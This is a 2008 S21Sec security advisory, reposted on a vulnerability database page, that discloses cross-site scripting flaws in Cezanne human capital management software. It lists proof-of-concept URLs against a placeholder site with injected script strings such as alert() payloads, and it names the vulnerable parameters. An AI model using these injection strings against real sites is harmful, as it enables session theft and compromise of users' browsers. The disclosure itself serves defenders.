Vulners
Lucene search
s21sec-42-en.txt
🗓️ 14 Apr 2008 00:00:00Reported by Juan de la Fuente CostaType 
packetstorm🔗 packetstormsecurity.com👁 35 Views
`##############################################################
- S21Sec Advisory -
##############################################################
Title: Cezanne SW Cross-Site Scripting (login required)
ID: S21SEC-042-en
Severity: Medium
History:
02.Jan.2008 Vulnerability discovered
Authors:
Juan de la Fuente Costa ([email protected])
Fco Javier Puerta Rubio ([email protected])
URL: http://www.s21sec.com/avisos/s21sec-41-en.txt
[ SUMMARY ]
Cezanne develops Human Capital Management Software.
This Software provides leading-edge Human Capital Management solutions
that help companies better develop, manage, reward and retain their most
important asset - their people.
Cezanne include applications for employee performance management, career &
succession planning, training & development, people management,
recruitment, salary analysis & compensation planning, pay review, employee
survey and organization charting.
[ AFFECTED VERSIONS ]
This vulnerability has been tested in Cezanne 6.5.1, and Cezanne 7.
[ DESCRIPTION ]
S21sec has discovered a vulnerability in Cezanne 6.5.1/Cezanne 7 that
allows injecting JavaScript code in text variables.
This issue allows javascript code execution in the user browser.
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/CFLookUP.asp?LookUPId=>"><script>alert("S21sec")</script>&CbFun=Focus_CallBack&FUNID=7302062&CloseOnGet=yes
VULNERABLE PARAMETERS:LookUPId,CbFun
STRING:>"><script>alert("S21sec")</script>
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/CznCommon/CznCustomContainer.asp?ACTION=RETRIEVE&Columns=2&Title=7302053&TitleParms="></title><script>alert('%20S21Sec%20')</script>&WidgetsFunctions=7100027%2C7302015&WidgetsColumns=1%2C1&WidgetsTogglers=Y%2CY&WidgetsHeights=%2D1%2C%2D1&WidgetsLinks=&WidgetsTitles=%2D1%2C%2D1&HideNonWorkingWidgets=Y&FUNID=7302031&LINKID=%2D1
VULNERABLE PARAMETERS:TitleParms, WidgetsHeights, WidgetsLinks, WidgetsTitles
STRING:"></title><script>alert('%20S21Sec%20')</script>
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/home.asp?CFTARGET=";}alert("S21sec")</SCRIPT>%20-->
VULNERABLE PARAMETERS::CFTARGET
STRING:";}alert("S21sec")</SCRIPT>%20-->
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/PeopleWeb/Cards/CVCard.asp
VULNERABLE PARAMETERS:PersonOid
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/PeopleWeb/Cards/PayrollCard.asp
VULNERABLE PARAMETERS:DESTLINKOID, PersonOID
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/PeopleWeb/CznDocFolder/CznDFStartProcess.asp
VULNERABLE PARAMETERS:FolderTemplateId, FolderTemplateName
[ WORKAROUND ]
Contact with Cezanne Software at: http://www.cezannesw.com/
[ ACKNOWLEDGMENTS ]
This vulnerability has been discovered and researched by:
- Juan de la Fuente Costa S21Sec
- Fco Javier Puerta Rubio S21Sec
You can find the last version of this warning in:
http://www.s21sec.com/es/avisos/s21sec-042-en.txt
http://www.s21sec.com
http://blog.s21sec.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4